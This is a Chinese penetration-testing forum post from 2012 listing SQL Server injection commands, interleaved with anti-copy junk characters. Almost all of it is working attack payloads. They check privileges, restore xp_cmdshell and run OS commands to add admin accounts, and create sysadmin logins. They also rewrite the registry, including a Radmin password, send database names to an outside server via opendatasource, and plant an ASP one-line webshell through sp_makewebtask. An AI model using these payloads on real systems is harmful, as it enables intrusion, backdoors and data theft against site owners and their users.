找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 阿D常用的一些注入命令
返回列表 发新帖
查看: 2485|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令" K& A1 ]" [- {2 b4 F
//看看是什么权限的$ Z/ z( Z5 a9 ]& Q- O* O1 k# D
and 1=(Select IS_MEMBER('db_owner'))
  r1 f: H1 I0 nAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--3 A9 f* m2 K! `' J! l. O; O
) W, ?: A: w* A- _) ?- j, S
//检测是否有读取某数据库的权限* h  _  M, n9 ^1 y: M, {, r
and 1= (Select HAS_DBACCESS('master'))
9 b7 x% R+ N! t) @% W/ eAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
/ K) T' f+ x$ q* g- D- ?- B8 C" s. x; J8 d% h( I+ R5 h1 W

% B- E% W$ _' ?数字类型% ]; S& Y6 \  t  P( k7 z, ]0 \+ R
and char(124)%2Buser%2Bchar(124)=0$ n7 w; w" R+ b. n' R

; c7 n% [& g* f2 v2 g$ \9 g' q1 a( K字符类型
: {# O) d& e, o( D7 g3 B' and char(124)%2Buser%2Bchar(124)=0 and ''='
& O+ ~3 ?+ L& `! \6 y6 h1 |/ c
0 S3 L# o# f  v% R/ l! o( J( F搜索类型
$ m% E, m* `3 ~7 E% B( Q8 ~! ?' V' and char(124)%2Buser%2Bchar(124)=0 and '%'='
) i( p0 T/ ?# T. N6 O9 D1 U- V$ A) |( `5 @, ?1 g7 c9 B
爆用户名9 D- C9 i" s! r' p* l3 l: Z
and user>0# R9 C! w) S. H# s0 C5 _) @0 U
' and user>0 and ''='
2 [3 ?( C5 A+ I+ W" V" T, k" F2 R" A9 J5 s
检测是否为SA权限# E  O2 P6 |- ^9 Q/ E
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
5 ^- a+ A% u9 m' d0 t# S" {, ]And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
5 ~$ n2 C7 P) ]- H0 j
$ f2 {. z0 |3 U6 D6 w+ k% S检测是不是MSSQL数据库
/ c  _1 O$ \1 `6 E/ u2 c# uand exists (select * from sysobjects);--
8 E; q. n8 h+ c( \$ B* K. D
" K/ I, G) G' n0 i8 G) r5 h检测是否支持多行7 z* @4 k* F; D: R  {( r! f/ `  N  k
;declare @d int;--
& r0 `: H- d$ t4 ~2 ?! s2 K3 _. U' Z: W+ s
恢复 xp_cmdshell
0 y; h8 n, }. W6 I7 s! y( e% D# F;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
6 s+ H4 K! f: A9 J( q* [1 S3 L# D. ~6 V  f4 ?4 d- }
6 s: j; `: M& T& k- R2 ^: m% ^
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
! j3 \" ?& o9 A2 Q6 d9 D! h: S% g: S
//-----------------------
9 |$ Q( i* P3 A& F3 r( q! Z5 k//      执行命令
+ s" O1 }6 c1 \5 E: ^) _& {//-----------------------
+ n  X' B/ q+ r0 X9 T) c# D( H6 |: l首先开启沙盘模式:
7 ]& m6 O5 Z. L1 [  F4 texec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1' K) ~( M% Y3 L; n3 Z

9 L1 F  y; y# J$ Y7 t然后利用jet.oledb执行系统命令
! O: k# h1 i$ j8 T8 v- h" n9 K6 w: cselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
+ V  i% f' Y" x! j) x( N/ h# w5 T
执行命令' }$ S/ b! _' F% e: b$ k* B- K
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
5 @  k* O' g% O' k/ T" ], I! D0 h/ d, j7 m( V' ]1 F
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
+ T) @( L; B+ ]; y  t" a
0 X" ]: D, P3 X- o判断xp_cmdshell扩展存储过程是否存在:; t7 a. \8 i/ y0 G8 {, v+ W
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
5 Q: J1 `" [* l) ^  O; C
, E& ?* T$ ?. A7 }9 E: U写注册表
* U6 d3 J7 h# texec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
& r/ ]- m9 E0 P$ `1 Y1 K1 k/ C; z* {' u1 z! E$ j
REG_SZ) I' a9 W" W4 d4 [4 o

  m" ^2 x% {; d7 G3 f: o0 o5 j  Z/ @读注册表
8 s8 M4 f" ~/ x; u6 H3 kexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
' M" ?! w1 b* E- b- p, a' R1 x. I% T: n, x8 c; c
读取目录内容( H4 g- D" b' h' I' S; f2 ]: e
exec master..xp_dirtree 'c:\winnt\system32\',1,16 d4 i+ h# C6 U# K5 g/ f
  j2 Y4 K0 b& h! u. H5 }3 l5 M

# e2 e+ ]) p" a( r数据库备份
7 ]- Z6 A' n4 y/ t4 \+ ~backup database pubs to disk = 'c:\123.bak'% J5 z- `) d7 r$ V0 y# q

" Z* b9 t  @' l, Y//爆出长度
$ }, P3 K$ Y4 i! KAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
# j4 T5 f$ f; ]. o
* M2 R* j( Q5 E8 }( D# W5 N  V" U

. t: e# ~4 W( n% ~4 h更改sa口令方法:用sql综合利用工具连接后,执行命令:
/ Y" N: e3 L% }; r4 D: Lexec sp_password NULL,'新密码','sa'
# s: b) w0 F$ d: c4 n
6 L/ U" b+ M; ~; j& w添加和删除一个SA权限的用户test:
9 ^3 m* F5 [# A6 y# o+ L3 Fexec master.dbo.sp_addlogin test,ptlove
3 W2 N$ X$ l. l( U1 nexec master.dbo.sp_addsrvrolemember test,sysadmin
+ h" ?8 C" U) W" w$ e  i6 W$ V
删除扩展存储过过程xp_cmdshell的语句: / g6 s6 T4 e$ ~$ f2 I) }
exec sp_dropextendedproc 'xp_cmdshell'8 a% y8 H5 k5 S, U4 d
* I) D9 B: C1 @6 c$ Q& s
添加扩展存储过过程
) u3 O) c8 R# p- @/ d$ pEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' ! g0 A1 _# H2 H" Z7 b0 r
GRANT exec On xp_proxiedadata TO public
: P3 m% ^# u) l
. ^, f& i. S2 R$ L% g4 Q: B9 i" z9 e2 m4 f
停掉或激活某个服务。
: v, F0 _& u9 l6 z" j! l2 U7 P+ N& J) N) H) q8 \
exec master..xp_servicecontrol 'stop','schedule'4 U; ?. B7 U3 u4 j
exec master..xp_servicecontrol 'start','schedule'
( n7 C: @; C- M; L/ V! H" ~, U8 ^
dbo.xp_subdirs
+ ?, Q- ]0 {/ U4 E) `6 r, U( e+ c8 l" w1 q  F2 F
只列某个目录下的子目录。
6 X) P. \, w! c: n! bxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp', A2 m) C, J/ H: [  h7 _2 }
  e- `+ P( E2 g4 L
dbo.xp_makecab$ ]1 Q. I. p4 a

1 e+ C& {7 e7 B将目标多个档案压缩到某个目标档案之内。- G# e0 f% S2 F- T( t/ `
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
! c, w, }% Y! f( W( m0 f
  u. g9 l, M' s$ q! I  [% @( Bdbo.xp_makecab
8 \4 Y/ I3 u' g1 ^  n'c:\test.cab','mszip',1,
) C: \1 {% u& b) ['C:\Inetpub\wwwroot\SQLInject\login.asp',0 g% Z. F  |) h  A, \9 t
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'. v7 x2 I  g1 q3 M4 G6 t$ h/ y

4 I) p3 Y1 _. t8 S/ j! ?1 `xp_terminate_process8 a, c8 j5 }9 u7 p# U

5 a+ \0 R* e/ T4 G# p2 x# H" J( N8 I停掉某个执行中的程序,但赋予的参数是 Process ID。' j4 o, j! u1 J% [% r$ l
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID) q( J3 B! |* u/ M3 z, Q

) O! [) i9 w3 Nxp_terminate_process 2484
5 d( K- U# @: X5 P3 E! t
+ W+ i" K5 D0 f: ?0 c% B! Z+ rxp_unpackcab
: }- [/ F7 h# b* c
: Z. X) j# e3 I* K$ Q% T解开压缩档。
1 w* C7 `) y$ l5 B2 ]9 ]
  K; m) V* l, s, Y; [# ^. lxp_unpackcab 'c:\test.cab','c:\temp',1
9 c# V( R4 c1 l
" _! b1 n' p1 |, p; }
. ~4 B# m' ]# z  Q某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234$ R3 w, K# \5 N& e+ k
  @4 A) s# d0 u
create database lcx;( r: s5 k! v' T7 K
Create TABLE ku(name nvarchar(256) null);
% F- N2 m3 ~7 k; }( {, p9 v7 |7 uCreate TABLE biao(id int NULL,name nvarchar(256) null);
2 C5 q# g5 o; S' S+ V, T% x* v3 W: ]* B! w! p
//得到数据库名
$ s4 s9 r# J5 q# [- t3 ninsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases: x* I) A& z0 W  b1 A7 H' a5 {

4 ~( ]0 |9 J$ Q$ T, Y; U
( E% a0 Q6 I' k! A, A- i//在Master中创建表,看看权限怎样( E( a9 ?- _5 }  u3 P0 M
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
& V8 c# A+ k$ f+ z1 \8 @0 e/ {2 I7 V/ P$ e7 E" H2 @
用 sp_makewebtask直接在web目录里写入一句话马:! W" U7 u7 }1 z. {
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
" o8 O! ^3 G$ b% K( p0 g( O! I* q* ~# j
//更新表内容
" F! x! r+ s& o' b7 {" m4 P/ \  MUpdate films SET kind = 'Dramatic' Where id = 123
( H( M2 z( r: r) I/ q; t. f* ~8 x0 m
3 E. g2 B' V( [6 Z5 \//删除内容
# d) m; P! p. E8 Hdelete from table_name where Stockid = 3
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表